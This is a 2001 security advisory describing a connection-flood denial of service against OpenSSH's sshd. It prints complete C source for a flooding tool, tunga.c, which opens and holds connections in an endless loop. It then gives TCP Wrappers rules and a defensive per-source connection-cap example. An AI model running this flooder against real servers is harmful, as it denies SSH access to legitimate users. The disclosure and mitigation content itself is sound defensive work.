OpenSSH denial of service

Published: 2001-12-12
Updated: 2001-12-12
Severity: medium
Threat type: remote denial of service
Error type: design error
Exploit mode: against the server

Affected systems
openssh

Detailed description
OpenSSH's sshd can be denied to legitimate users by a connection flood: an attacker opens TCP connections to the SSH port in a tight loop, never sends an identification string, and never closes them. Each such connection occupies one of the limited slots sshd keeps for connections that have not yet finished the protocol version exchange (the MaxStartups cap in sshd_config). Once those slots are exhausted sshd closes every further connection before sending its banner, so while the flood runs a normal client sees:

    $ ssh user@somehost.com
    ssh_exchange_identification: Connection closed by remote host

The service is effectively stopped for everyone until the attacker's sockets go away.

Test code
--[ Code ]--

    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <netdb.h>
    #include <stdio.h>
    #include <stdlib.h>   /* exit, atoi */
    #include <string.h>   /* memcpy, memset */
    #include <unistd.h>

    /* tunga.c: opens TCP connections to the target sshd in an endless loop
     * and never closes them or sends an identification string, so each one
     * holds a pre-authentication slot on the server for as long as this
     * process lives. */
    int main(int argc, char *argv[])
    {
        int sd, rc;
        struct sockaddr_in servAddr;
        struct hostent *h;

        if (argc < 3) {
            printf("tunga.c - OpenSSH DoS Attack\n");
            printf("by DrBrain <drbrain@phibernet.org>\n");
            printf("Phibernet Information Network < http://www.phibernet.org >\n\n");
            printf("Usage: %s <victim> <port>\n\n", argv[0]);
            exit(1);
        }

        h = gethostbyname(argv[1]);
        if (h == NULL) {
            printf("%s: Unknown Host '%s'\n", argv[0], argv[1]);
            exit(1);
        }

        memset(&servAddr, 0, sizeof(servAddr));
        servAddr.sin_family = h->h_addrtype;
        memcpy(&servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
        servAddr.sin_port = htons(atoi(argv[2]));

        /* Each iteration deliberately leaks one connected socket. The loop
         * ends only when socket() or connect() fails, e.g. with EMFILE once
         * the attacker's own descriptor limit is reached. */
        for (;;) {
            sd = socket(AF_INET, SOCK_STREAM, 0);
            if (sd < 0) {
                perror("Cannot Open Socket ");
                exit(1);
            }
            rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));
            if (rc < 0) {
                perror("Cannot Connect ");
                exit(1);
            }
        }
        exit(0);
    }

Solution
Build the SSH server with libwrap (TCP Wrappers) support, then restrict which source addresses may reach sshd in /etc/hosts.allow and /etc/hosts.deny. Note that this only helps once the offending sources are known and that the libwrap decision is taken after the TCP connection has been accepted; filtering at the packet filter, and keeping sshd's MaxStartups cap low enough that one source cannot take every slot, are the complementary measures.

Related information
Pedro Inacio <drbrain@phibernet.org>
Reference: http://www.securityfocus.com/archive/82/244767
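A concrete hosts.allow/hosts.deny pair for the solution above, added here as an illustration rather than taken from the advisory. The daemon name is the basename of the sshd binary; the networks and host are placeholders from the documentation address ranges and are assumed, not prescribed:

```text
# /etc/hosts.deny -- refuse sshd to every source not listed in hosts.allow
sshd: ALL

# /etc/hosts.allow -- the only sources permitted to reach sshd
sshd: 192.0.2.0/255.255.255.0, 198.51.100.20, 127.0.0.1
```

The deny file is consulted only when no allow rule matches, so the pair above is a default-deny policy for sshd alone and leaves other wrapped services untouched. Because the check runs after accept(), each flood connection still costs sshd an accept and a lookup before it is dropped; what the rules buy is that a refused source never gets as far as the version exchange.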
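The advisory's flood works because nothing ties the number of connections still waiting for the version exchange back to the address that opened them. The following is an added illustration of that missing per-source cap, written for this page and not code from OpenSSH or from the advisory's author: a small table of source addresses, each allowed at most MAX_PER_SOURCE connections in the pre-authentication phase. The limits and the addresses in the constructed replay are assumptions. Once a source is at its cap, further connects from it are refused while a different address is still admitted, which is the property the tunga.c flood defeats on an uncapped server.

```c
#include <stdio.h>
#include <stdint.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Added illustration, not code from the advisory or from OpenSSH: a cap on
 * the number of connections one source address may hold in the
 * pre-authentication phase. The limits below are assumed values. */

#define MAX_SOURCES     64   /* assumed: distinct source addresses tracked */
#define MAX_PER_SOURCE   3   /* assumed: pending connections per source */

struct source_entry {
    uint32_t addr;     /* IPv4 address in network byte order */
    int      pending;  /* connections that have not finished the exchange */
};

static struct source_entry table[MAX_SOURCES];
static int table_len = 0;

static struct source_entry *lookup(uint32_t addr, int create)
{
    for (int i = 0; i < table_len; i++)
        if (table[i].addr == addr)
            return &table[i];
    if (!create || table_len == MAX_SOURCES)
        return NULL;
    table[table_len].addr = addr;
    table[table_len].pending = 0;
    return &table[table_len++];
}

/* Called right after accept(). Returns 1 if the connection may proceed to
 * the identification exchange, 0 if it should be closed at once. */
int pending_admit(const char *ip)
{
    struct in_addr in;
    struct source_entry *e;

    if (inet_pton(AF_INET, ip, &in) != 1)
        return 0;                       /* unparsable address: refuse */
    e = lookup(in.s_addr, 1);
    if (e == NULL)
        return 0;                       /* table full: refuse new sources */
    if (e->pending >= MAX_PER_SOURCE)
        return 0;                       /* this source is at its cap */
    e->pending++;
    return 1;
}

/* Called when the exchange completes or the socket is closed. */
void pending_release(const char *ip)
{
    struct in_addr in;
    struct source_entry *e;

    if (inet_pton(AF_INET, ip, &in) != 1)
        return;
    e = lookup(in.s_addr, 0);
    if (e != NULL && e->pending > 0)
        e->pending--;
}

/* Replays a constructed flood from one address, as tunga.c would produce,
 * and returns how many of its connections were admitted. */
int simulate_flood(const char *attacker_ip, int connects)
{
    int admitted = 0;
    for (int i = 0; i < connects; i++)
        admitted += pending_admit(attacker_ip);
    return admitted;
}

int main(void)
{
    /* Constructed addresses from the documentation ranges. */
    int admitted = simulate_flood("203.0.113.9", 1000);
    printf("attacker admitted %d of 1000 connections\n", admitted);
    printf("legitimate client admitted: %d\n", pending_admit("198.51.100.20"));
    pending_release("203.0.113.9");
    printf("attacker admitted after one release: %d\n",
           pending_admit("203.0.113.9"));
    return 0;
}
```

The table is a fixed array to keep the example short; a real server would want an expiring structure so that a flood of distinct spoofed sources cannot fill it and turn the defence into a refusal of everyone, which is why the code refuses rather than admits when the table is full.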